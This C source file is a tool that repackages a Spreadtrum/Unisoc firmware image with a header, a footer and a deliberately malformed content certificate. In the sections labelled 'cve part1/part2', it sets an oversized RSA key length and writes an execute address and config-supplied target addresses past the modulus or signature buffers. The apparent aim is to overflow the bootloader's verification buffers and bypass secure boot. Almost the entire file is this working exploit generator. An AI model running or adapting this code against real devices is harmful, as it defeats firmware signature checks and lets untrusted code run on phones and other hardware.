#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include "mincrypt/sha256.h"

/* Success/failure values returned by _get_cfg(). */
#define TRUE 1
#define FALSE 0

/*
 * Image header placed at offset 0 of the output file.
 *
 * main() writes it with fwrite as exactly 0x200 raw bytes, in host byte
 * order. When the input already starts with this magic, main() reads
 * mImgSize back from byte offset 0x30. The in-memory layout is therefore the
 * on-disk layout; the size check below the struct guards it.
 */
typedef struct {
    uint32_t  mMagicNum;        // 0x42544844 ("BTHD" as a big-endian word, "boothead"); the file bytes read "DHTB" on little-endian hosts
    uint32_t  mVersion;         // 1
    uint8_t   mPayloadHash[32]; // sha256 hash value (main() leaves this zeroed)
    uint64_t  mImgAddr;         // image loaded address (main() leaves this zeroed)
    uint32_t  mImgSize;         // image (payload) size, at byte offset 0x30
    uint32_t  is_packed;        // packed image flag 0:false 1:true
    uint32_t  mFirmwareSize;    // runtime firmware size
    uint8_t   reserved[452];    // 452 + 15*4 = 512
} sys_img_header;
/* Fails to compile if padding ever makes the header anything but 0x200 bytes. */
typedef char sys_img_header_size_check[(sizeof(sys_img_header) == 0x200) ? 1 : -1];

#define MAGIC_SIZE 8
/*
 * Footer that main() writes immediately after the payload (0x60 raw bytes).
 * main() fills payload_size/payload_offset and cert_size/cert_offset and
 * leaves every other field, including magic, zeroed.
 */
typedef struct sprdsignedimageheader {

    /* Magic number */
    uint8_t magic[MAGIC_SIZE];
    /* Major version of this header format */
    uint32_t header_version_major;
    /* Minor version of this header format */
    uint32_t header_version_minor;

    /* image body, plain or cipher text */
    uint64_t payload_size;
    uint64_t payload_offset;

    /*
     * The original notes say offsets are counted from the start of this
     * header. NOTE(review): main() stores absolute file offsets here
     * (payload at 0x200, cert right after this footer). Confirm which
     * convention the loader expects.
     */
    /* content certification size, if 0, ignore */
    uint64_t cert_size;
    uint64_t cert_offset;

    /* (opt) private content size, if 0, ignore */
    uint64_t priv_size;
    uint64_t priv_offset;

    /* (opt) debug/rma certification primary size, if 0, ignore */
    uint64_t cert_dbg_prim_size;
    uint64_t cert_dbg_prim_offset;

    /* (opt) debug/rma certification second size, if 0, ignore */
    uint64_t cert_dbg_developer_size;
    uint64_t cert_dbg_developer_offset;

} sprdsignedimageheader;
/* 8 + 4 + 4 + 10 * 8 = 0x60 bytes; fails to compile if padding changes that. */
typedef char sprdsignedimageheader_size_check[(sizeof(sprdsignedimageheader) == 0x60) ? 1 : -1];

/* Byte capacity of the RSA modulus and signature buffers (0x100 = 256 bytes). */
#define RSA_KEY_BYTE_LEN_MAX 0x100

/* RSA public key embedded in sprd_contentcert. */
typedef struct sprd_rsapubkey {
    uint32_t keybit_len;	//1024/2048,max 2048 (main() deliberately sets a larger value)
    uint32_t e;	// public exponent; main() stores 0x01000100 (presumably 65537 in big-endian byte order - confirm)
    uint8_t mod[RSA_KEY_BYTE_LEN_MAX];	// modulus bytes
} sprd_rsapubkey;

#define HASH_BYTE_LEN 32
typedef struct sprd_contentcert {
    uint32_t certtype;	//0:content cert
    sprd_rsapubkey pubkey;	//pubkey for this cert, to verify signature in this cert
    uint8_t hash_data[HASH_BYTE_LEN];	//hash of image component
    uint32_t type;
    uint32_t version;
    uint8_t signature[RSA_KEY_BYTE_LEN_MAX];	//signature of hash_data
} sprd_contentcert;

/*
 * Hash `bytes_num` bytes starting at `data` with SHA-256 and copy the
 * SHA256_DIGEST_SIZE-byte digest into the caller-supplied `hash` buffer.
 */
void do_sha256(uint8_t* data, int bytes_num, unsigned char* hash)
{
    SHA256_CTX state;

    SHA256_init(&state);
    SHA256_update(&state, data, bytes_num);
    /* SHA256_final returns a pointer into `state`; copy it out before return. */
    memcpy(hash, SHA256_final(&state), SHA256_DIGEST_SIZE);
}

/*
 * Read the whole file `fn` into a newly malloc'd buffer that the caller must
 * free().
 *
 * `extra` zero bytes are appended after the contents so that callers can
 * round the length up without reading past the allocation. Everything past
 * the bytes actually read (after a short fread, too) is zeroed.
 *
 * On return, *num (if non-NULL) holds the number of bytes read. Returns
 * NULL and sets *num to 0 in any of these cases:
 *   - the file cannot be opened;
 *   - the file is empty;
 *   - the file cannot be sized;
 *   - the size plus `extra` overflows, or allocation fails.
 */
static uint8_t* loadfile(const char* fn, size_t* num, size_t extra) {
    uint8_t* buf = NULL;
    size_t got = 0;
    FILE* fi;

    if (num) *num = 0;
    fi = fopen(fn, "rb");
    if (!fi) return NULL;

    if (fseek(fi, 0, SEEK_END) == 0) {
        long end = ftell(fi); /* -1 on error */
        if (end > 0 && (unsigned long)end <= SIZE_MAX - extra &&
            fseek(fi, 0, SEEK_SET) == 0) {
            size_t n = (size_t)end;
            buf = (uint8_t*)malloc(n + extra);
            if (buf) {
                got = fread(buf, 1, n, fi);
                /* Zero the unread tail (if any) plus the requested padding. */
                memset(buf + got, 0, n - got + extra);
            }
        }
    }
    fclose(fi);
    if (num) *num = got;
    return buf;
}

/*
 * Positional indices into cfg[]. main() looks up the first five config
 * entries by their position in the file, not by the parsed id field.
 * Entries after ID_MAX are the target addresses handled by the "cve" loops
 * in main().
 */
enum ITEM_ID {
    ID_MIN = 0,
    ANTI_ROLLBACK_VERSION = ID_MIN, /* initial img_cert->version (raised to the input cert's version if higher) */
    EXECUTE_ADDR,                   /* first big-endian word written for each target; 0x5700 enables the 0x3B0 adjustment */
    G_N_ADDR,                       /* nonzero: extend pubkey.mod and derive keybit_len from this address (presumably the device g_n buffer - confirm) */
    G_SIG_ADDR,                     /* used instead of G_N_ADDR when that is 0: extend signature (presumably the device g_sig buffer - confirm) */
    MEM_USAGE,                      /* added into the second word written for each target */
    ID_MAX = MEM_USAGE
};

/* Capacity of the cfg[] table. */
#define LIST_MAX   20
typedef struct _ITEM_CFG { /* Information of every item */
    uint32_t               id;   /* first field of the line; printed, not used for lookup in this file */
    char               str[20];  /* second field, as text */
    uint64_t           num;      /* str converted with strtoull(str, NULL, 0) */
} ITEM_CFG;
/* Parsed config entries in file order; filled by _get_cfg(), indexed with enum ITEM_ID. */
static ITEM_CFG cfg[LIST_MAX];
/* Number of entries of cfg[] filled by the last _get_cfg() call. */
static uint32_t item_num = 0;

/*
 * Parse the config file `cfg_p` into the global cfg[] table.
 *
 * Each entry line is "<id> <value>". <value> is converted with strtoull base
 * 0, so decimal, 0x-hex and 0-octal are accepted. Entries are stored in file
 * order, and main() addresses them by position (enum ITEM_ID). For that
 * reason, lines that are blank, start with '#' after optional blanks, or do
 * not contain both fields are skipped rather than stored.
 *
 * Returns TRUE on success. Returns FALSE if the file cannot be opened or
 * holds more than LIST_MAX entries. item_num receives the entry count.
 */
static int _get_cfg(char* cfg_p)
{
    char line[512];
    FILE* cfg_fd;

    if (!(cfg_fd = fopen(cfg_p, "r"))) {
        printf("open cfg file error\n");
        return FALSE;
    }
    memset(cfg, 0, sizeof(cfg));
    item_num = 0;
    while (fgets(line, sizeof(line), cfg_fd)) {
        const char* p = line;
        unsigned int id = 0;
        char str[sizeof(cfg[0].str)] = {0};

        while (*p == ' ' || *p == '\t') p++;
        if (*p == '#' || *p == '\0' || *p == '\n' || *p == '\r') {
            continue;
        }
        /* %19s keeps the copy inside str[20]. Requiring both fields stops a
           stray line from shifting the positional indices main() uses. */
        if (sscanf(p, "%u %19s", &id, str) != 2) {
            continue;
        }
        if (item_num >= LIST_MAX) {
            printf(" Max support %d item, this config has too many item!!!\n", LIST_MAX);
            fclose(cfg_fd);
            return FALSE;
        }
        cfg[item_num].id = id;
        memcpy(cfg[item_num].str, str, sizeof(str));
        cfg[item_num].num = strtoull(str, NULL, 0);
        printf("%u\t0x%llx\t\n", (unsigned)cfg[item_num].id, (unsigned long long)cfg[item_num].num);
        item_num++;
    }
    fclose(cfg_fd);
    return TRUE;
}

/* Print a printf-style message to stderr and terminate with exit status 1. */
#define ERR_EXIT(...) \
    do { fprintf(stderr, __VA_ARGS__); exit(1); } while (0)

/*
 * Store the low 32 bits of `a` at `p` in big-endian byte order.
 *
 * The former macro body evaluated its value argument four times. This
 * function evaluates it once and converts it to uint32_t. Passing a 64-bit
 * value therefore stores the same four low bytes as before, and expressions
 * with side effects are safe.
 */
static inline void write32_be(void* p, uint32_t a)
{
    uint8_t* b = (uint8_t*)p;
    b[0] = (uint8_t)(a >> 24);
    b[1] = (uint8_t)(a >> 16);
    b[2] = (uint8_t)(a >> 8);
    b[3] = (uint8_t)a;
}
#define WRITE32_BE(p, a) write32_be((p), (a))

int main(int argc, char** argv)
{
    if (argc < 3) ERR_EXIT("Usage: %s <cfg> <filename>\n", argv[0]);

    if (!_get_cfg(argv[1]))
    {
        printf("Read cfg file error !\n");
        return 1;
    }
    if (!cfg[G_N_ADDR].num && !cfg[G_SIG_ADDR].num) ERR_EXIT("g_n/g_sig cfg error\n");

    char* filename = argv[2];
    uint8_t* mem; size_t size = 0;
    mem = loadfile(filename, &size, 16);
    uint8_t* mem0 = mem;
    if (!mem) ERR_EXIT("loadfile(\"%s\") failed\n", filename);
    if (remove(filename)) ERR_EXIT("Failed to delete the file.\n");

    printf("file size: 0x%zx\n", size);
    int raw = 1;
    size = (size + 15) & 0xFFFFFFF0;
    if (*(uint32_t*)mem == 0x42544844) {
        if (!(*(uint32_t*)&mem[0x30])) ERR_EXIT("broken sprd trusted firmware\n");
        raw = 0;
        size = *(uint32_t*)&mem[0x30];
    }
    printf("payload size: 0x%zx\n", size);

    FILE* file = fopen(filename, "wb");
    if (file == NULL) ERR_EXIT("Failed to create the file.\n");

    //HEADER
    sys_img_header   img_h;
    memset(&img_h, 0, 0x200);
    img_h.mMagicNum = 0x42544844;
    img_h.mVersion = 1;
    img_h.mImgSize = size;
    if (0x200 != fwrite(&img_h, sizeof(unsigned char), 0x200, file)) ERR_EXIT("Failed to write the header.\n");

    if (!raw) mem += 0x200;
    if (size != fwrite(mem, sizeof(unsigned char), size, file)) ERR_EXIT("Failed to write payload.\n");

    //FOOTER
    sprdsignedimageheader img_f;
    memset(&img_f, 0, 0x60);
    img_f.payload_size = size;
    img_f.payload_offset = 0x200;
    img_f.cert_size = sizeof(sprd_contentcert);
    img_f.cert_offset = size + 0x200 + 0x60;
    if (0x60 != fwrite(&img_f, sizeof(unsigned char), 0x60, file)) ERR_EXIT("Failed to write the footer.\n");

    //cve part1
    int maxnumid = ID_MAX + 1;
    int minnumid = ID_MAX + 1;
    for (int i = ID_MAX + 2; i < item_num; i++)
    {
        if (cfg[maxnumid].num < cfg[i].num)
        {
            maxnumid = i;
        }
        if (cfg[minnumid].num > cfg[i].num)
        {
            minnumid = i;
        }
    }
    int length_needed = cfg[maxnumid].num - cfg[minnumid].num;
    if (cfg[G_N_ADDR].num)
    {
        if((length_needed - (2 * RSA_KEY_BYTE_LEN_MAX + HASH_BYTE_LEN)) >= 0) length_needed += 0x1C;
        else length_needed = sizeof(sprd_contentcert);
    }
    else
    {
        length_needed = (length_needed > (RSA_KEY_BYTE_LEN_MAX - 0x10)) ? (length_needed + 0x144) : sizeof(sprd_contentcert);
    }

    //cert
    sprd_contentcert* img_cert = (sprd_contentcert*)malloc(length_needed);
    memset(img_cert, 0, length_needed);
    img_cert->certtype = 0;
    img_cert->pubkey.e = 0x01000100;
    do_sha256(mem, size, &img_cert->hash_data[0]);
    img_cert->type = 1;
    img_cert->version = cfg[ANTI_ROLLBACK_VERSION].num;
    if (!raw)
    {
        uint32_t version_in_file = 0;
        if(*(uint32_t*)&mem[size + 0x60] == 0) version_in_file = *(uint32_t*)&mem[size + 0x190];
        else if(*(uint32_t*)&mem[size + 0x60] == 1) version_in_file = *(uint32_t*)&mem[size + 0x1B0];
        if (img_cert->version < version_in_file) img_cert->version = version_in_file;
    }

    //cve part2
    if (cfg[G_N_ADDR].num)
    {
        img_cert->pubkey.keybit_len = (cfg[maxnumid].num + 8 - cfg[G_N_ADDR].num) * 8;
        printf("using G_N_ADDR\n");
    }
    else
    {
        img_cert->pubkey.keybit_len = (cfg[maxnumid].num + 8 - cfg[G_SIG_ADDR].num) * 8;
        printf("using G_SIG_ADDR\n");
    }
    printf("keybit len: 0x%x\n", img_cert->pubkey.keybit_len);

    for (int i = ID_MAX + 1; i < item_num; i++)
    {
        int extra = 0;
        if (cfg[G_N_ADDR].num) {
            if ((cfg[maxnumid].num - cfg[i].num > RSA_KEY_BYTE_LEN_MAX - 0x10) && (cfg[maxnumid].num - cfg[i].num < RSA_KEY_BYTE_LEN_MAX + HASH_BYTE_LEN + 0x10))
            {
                //overflow here will break img_cert.hash_data or img_cert.type or img_cert.version
                printf("0x%llx skiped due to pubkey.n overflow\n", cfg[i].num);
                continue;
            }
            if (cfg[EXECUTE_ADDR].num == 0x5700 && cfg[maxnumid].num - cfg[i].num > 2 * RSA_KEY_BYTE_LEN_MAX + HASH_BYTE_LEN) extra = 0x3B0;
            WRITE32_BE((char*)&img_cert->pubkey.mod + 4 + cfg[maxnumid].num - cfg[i].num, cfg[EXECUTE_ADDR].num);
            WRITE32_BE((char*)&img_cert->pubkey.mod + 4 + cfg[maxnumid].num - cfg[i].num + 8, cfg[i].num - 8 + cfg[MEM_USAGE].num + extra);
        }
        else
        {
            if (cfg[EXECUTE_ADDR].num == 0x5700 && cfg[maxnumid].num - cfg[i].num > RSA_KEY_BYTE_LEN_MAX - 0x10) extra = 0x3B0;
            WRITE32_BE((char*)&img_cert->signature + 4 + cfg[maxnumid].num - cfg[i].num, cfg[EXECUTE_ADDR].num);
            WRITE32_BE((char*)&img_cert->signature + 4 + cfg[maxnumid].num - cfg[i].num + 8, cfg[i].num - 8 + cfg[MEM_USAGE].num + extra);
        }
    }
    if (length_needed != fwrite(img_cert, sizeof(unsigned char), length_needed, file)) ERR_EXIT("Failed to write cert.\n");
    free(img_cert);
    fclose(file);
    free(mem0);

    return 0;
}
